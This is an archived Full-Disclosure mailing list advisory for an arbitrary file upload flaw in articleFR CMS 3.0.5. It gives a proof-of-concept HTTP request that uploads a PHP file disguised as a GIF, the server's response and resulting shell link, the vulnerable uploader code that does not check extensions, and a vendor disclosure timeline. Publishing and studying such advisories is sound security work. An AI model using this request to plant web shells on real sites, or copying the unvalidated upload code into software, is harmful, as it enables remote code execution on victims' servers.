lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006a01d0352b$f1aa7390$d4ff5ab0$@itas.vn>
Date: Wed, 21 Jan 2015 10:40:00 +0700
From: "Tien Tran Dinh" <tien.d.tran@...s.vn>
To: <fulldisclosure@...lists.org>
Cc: info@...s.vn
Subject: [FD] Arbitrary File Upload in articleFR CMS 3.0.5

#Vulnerability title: Arbitrary File Upload in articleFR CMS 3.0.5

#Product: articleFR CMS

#Vendor: http://freereprintables.com

#Download link: https://github.com/articlefr/articleFR

#Affected version: version 3.0.5 

#Fixed version: N/A

#Author: Tran Dinh Tien (tien.d.tran@...s.vn) & ITAS Team (www.itas.vn)

 

 

::DESCRITION::

- Vulnerabilities related to the upload of unexpected file types is unique
in that the upload should quickly reject a file if it does not have a
specific extension. Additionally, this is different from uploading malicious
files in that in most cases an incorrect file format may not by itself be
inherently "malicious" but may be detrimental to the saved data. 

- The application may be expecting only certain file types to be uploaded
for processing, such as mpeg4, ogv, ogg, 3gp, webm, gif, mkv, flv, drc, mng,
avi,... files. The application may not validate the uploaded file by
extension (for low assurance file validation) or content (high assurance
file validation).

 

 

 

:: PROOF OF CONCEPT::

 

- REQUEST:

 

POST /articlefr/dashboard/videouploader.php HTTP/1.1

Host: target.org

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Referer: http://target.org/articlefr/dashboard/videos/fileupload/

Content-Length: 414

Content-Type: multipart/form-data;
boundary=---------------------------277651700022570

Cookie: GEAR=local-5422433b500446ead50002d4;
PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773;
__unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache

 

-----------------------------277651700022570

Content-Disposition: form-data; name="myVideo"; filename="img.php"

Content-Type: image/gif

 

<?php 

phpinfo(); 

?>

-----------------------------277651700022570

Content-Disposition: form-data; name=""

 

undefined

-----------------------------277651700022570

Content-Disposition: form-data; name=""

 

undefined

-----------------------------277651700022570--

 

 

 

- RESPONSE:

 

HTTP/1.1 200 OK

Date: Mon, 22 Dec 2014 03:10:30 GMT

Server: Apache/2.2.15 (Red Hat)

Content-Type: text/html

Vary: Accept-Encoding

Accept-Ranges: none

Keep-Alive: timeout=15, max=100

Connection: Keep-Alive

Content-Length: 36

 

[String_Random].php

 

- Shell link:
http://target.org/articlefr2/dashboard/videos/[String_Random].php

 

 

- Vulnerable file: articlefr/dashboard/videouploader.php

 

- Vulnerable code:

 

<?php

$output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";

if(isset($_FILES["myVideo"]))

{

                $ret = array();

 

                $error =$_FILES["myVideo"]["error"];

                

                if(!is_array($_FILES["myVideo"]["name"])) 

                {

                               $fileName = $_FILES["myVideo"]["name"];

                               $extension = pathinfo($fileName,
PATHINFO_EXTENSION);

                               $newFileName = md5(uniqid() . $fileName) .
'.' . $extension;

                               

 
move_uploaded_file($_FILES["myVideo"]["tmp_name"],
$output_dir.$newFileName);

                $ret[]= $newFileName;

                }

                

    echo $newFileName;

}

?>

 

 

::DISCLOSURE::

+ 12/09/2014: Contact to vendor - vendor did not reply

+ 12/11/2014: Contact to vendor - vendor did not reply

+ 12/22/2014: Contact to vendor - vendor replied

+ 12/23/2014: Send the detail vulnerability to vendor - vendor did not reply

+ 01/21/2015: Public information

 

 

::REFERENCE::

-
http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-
trong-articlefr-cms-71.html

 

 

::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.

 

 

Sincerely,

 


Tien Tran Dinh (tien.d.tran@...s.vn)

 


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ